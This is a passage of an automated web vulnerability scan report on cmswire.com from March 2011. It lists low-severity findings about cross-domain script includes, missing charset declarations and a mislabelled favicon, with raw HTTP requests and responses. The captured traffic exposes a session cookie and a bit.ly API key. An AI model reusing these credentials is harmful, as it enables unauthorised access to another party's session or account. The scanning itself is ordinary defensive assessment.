    <script type="text/javascript" charset="utf-8" src="http://static.polldaddy.com/p/4689136.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://analytics.aweber.com/js/awt_analytics.js?id=7tsm"></script>
...[SNIP]...

4.8. http://www.cmswire.com/taf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /taf.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /taf.php HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6525
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Tell a Friend - CMS
...[SNIP]...
</script>
   <script type="text/javascript" charset="utf-8"
       src="http://bit.ly/javascript-api.js?version=latest&login=cmswire&apiKey=R_b3dc245c49f83a8bd4854c113a8221e6">

   </script>
   <script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/utilities/utilities.js"></script>
   <script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js"></script>
...[SNIP]...

4.9. http://www.cmswire.com/utils/user/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /utils/user/signup.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /utils/user/signup.php HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:56:58 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3882
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<!-- jQuery on CDN -->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
...[SNIP]...

5. HTML does not specify charset  previous  next
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


5.1. http://www.cmswire.com/click/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /click/

Request

GET /click/ HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:56:48 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 904
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Leaving CMSWire.com...</title>
</head>
<body>
   <script t
...[SNIP]...

5.2. http://www.cmswire.com/taf.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /taf.php

Request

GET /taf.php HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6525
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Tell a Friend - CMS
...[SNIP]...

5.3. http://www.cmswire.com/utils/user/signup.php  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmswire.com
Path:   /utils/user/signup.php

Request

GET /utils/user/signup.php HTTP/1.1
Host: www.cmswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitCount=1; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; PHPSESSID=80f04db3f305da3334eedebb2141974a; __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274;

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:56:58 GMT
Server: Apache/2.0.52 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 3882
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.cmswire.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.cmswire.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=80f04db3f305da3334eedebb2141974a; __gads=ID=a8fa714e8d3e9a47:T=1300296849:S=ALNI_MZUVjzrWG8LOGwMr99KpiC3QIo8Iw; __utma_a2a=8244481635.1331853788.1300296862.1300296862.1300296862.1; __utmz=97231501.1300296863.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=97231501.762556402.1300296844.1300296844.1300296844.1; __utmc=97231501; __utmb=97231501.3.8.1300296863274; VisitCount=1; FirstVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT; LastVisit=Wed%2C%2016%20Mar%202011%2017%3A34%3A24%20GMT

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 18:36:04 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sun, 30 Nov 2008 17:26:12 GMT
ETag: "90265-2366-64059500"
Accept-Ranges: bytes
Content-Length: 9062
Connection: close
Content-Type: text/plain

...... ..........F...........h....... .... .....V......... .h.......(... ...@.......................................&N..FFB.&&".........662.....VVN.............>>:.......*.........^^Z.JJB..
.......*
...[SNIP]...

Report generated by XSS.CX at Thu Mar 17 08:26:18 CDT 2011.